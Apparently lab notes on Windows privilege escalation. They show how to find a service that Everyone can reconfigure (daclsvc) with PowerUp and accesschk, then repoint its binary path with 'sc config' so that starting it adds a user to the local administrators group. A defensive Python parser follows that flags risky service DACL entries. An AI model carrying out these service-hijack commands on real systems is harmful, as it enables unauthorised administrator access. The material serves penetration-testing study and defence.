Binary
We're trying to find a user with the “SERVICE_CHANGE_CONFIG” permission.
To check with PowerUp:
powershell
powershell -ep bypass
. .\PowerUp.ps1
Invoke-Result:
To check manually (Accesschk), from CMD:
cd Desktop\Tools\Accesschk
accesschk64.exe -uwcv Everyone *
u: suppresses errors
w: shows only objects that have write access
c: treats the name as a Windows service (* means all services)
v: verbose (as much detail as you can give me)
Result:
So we know we can use daclsvc because it gives us that change config option with RW (read and write) permissions.
Find more information about the service:
accesschk64.exe -uwcv daclsvc
We see the permissions for every user group. We can adjust our initial query to check other groups if we have a slightly privileged account that maybe has that option even though Everyone does not!
Query the service:
sc qc daclsvc
We see the binary path to the service. Because we have Change Config permission, we can actually change the path to our executable or the command we want to run:
sc config daclsvc binpath= "net localgroup administrators user /add"
Make it run:
sc start daclsvc
This might cause an error because technically the executable isn’t going to “run” but it will run the command instead.
Check that your user was added to admins:
net localgroup administrators
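A defensive check for the weakness this walkthrough relies on, as an added example that is not part of the original notes: it parses a service security descriptor in SDDL form (the format `sc sdshow <service>` prints) and reports allow-ACEs that give low-privileged groups SERVICE_CHANGE_CONFIG, or a right that includes or can grant it. The function names and both SDDL strings are constructed for illustration, not the real descriptor of daclsvc, and deny ACEs are not evaluated.

```python
import re

# SDDL right codes as they apply to service objects (two letters each).
RIGHT_BITS = {
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100, "SD": 0x10000, "RC": 0x20000,
    "WD": 0x40000, "WO": 0x80000, "GA": 0x10000000, "GW": 0x40000000,
}
# Rights that are, include, or can be used to grant SERVICE_CHANGE_CONFIG.
RISKY = {
    "SERVICE_CHANGE_CONFIG": 0x2, "WRITE_DAC": 0x40000, "WRITE_OWNER": 0x80000,
    "GENERIC_ALL": 0x10000000, "GENERIC_WRITE": 0x40000000,
}
# Trustees any ordinary logged-on user belongs to (SDDL alias or raw SID).
LOW_PRIV = {
    "WD": "Everyone", "S-1-1-0": "Everyone",
    "AU": "Authenticated Users", "S-1-5-11": "Authenticated Users",
    "BU": "BUILTIN\\Users", "S-1-5-32-545": "BUILTIN\\Users",
    "IU": "INTERACTIVE", "S-1-5-4": "INTERACTIVE",
}

def rights_mask(rights):
    """Turn an ACE rights field (letter codes or 0x hex) into an access mask."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    mask = 0
    for code in re.findall("..", rights):
        mask |= RIGHT_BITS.get(code, 0)
    return mask

def risky_aces(sddl):
    """Return [(trustee, [right names])] for allow-ACEs in the DACL only."""
    dacl = re.search(r"D:[^()]*((?:\([^)]*\))*)", sddl)  # stops before S: (SACL)
    findings = []
    for ace in re.findall(r"\(([^)]*)\)", dacl.group(1) if dacl else ""):
        fields = ace.split(";")  # type;flags;rights;object;inherit_object;trustee
        if len(fields) < 6 or fields[0] != "A":
            continue
        granted = rights_mask(fields[2])
        names = [n for n, bit in RISKY.items() if granted & bit]
        if fields[5] in LOW_PRIV and names:
            findings.append((LOW_PRIV[fields[5]], names))
    return findings

# Constructed samples: Everyone (trustee WD) gets DC in WEAK; HARDENED omits it.
WEAK = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
        "(A;;CCDCLCSWRPWPRC;;;WD)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
HARDENED = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
            "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;AU)")
```

Note that `WD` means WRITE_DAC in the rights field but Everyone in the trustee field, which is why the parser reads each ACE by position.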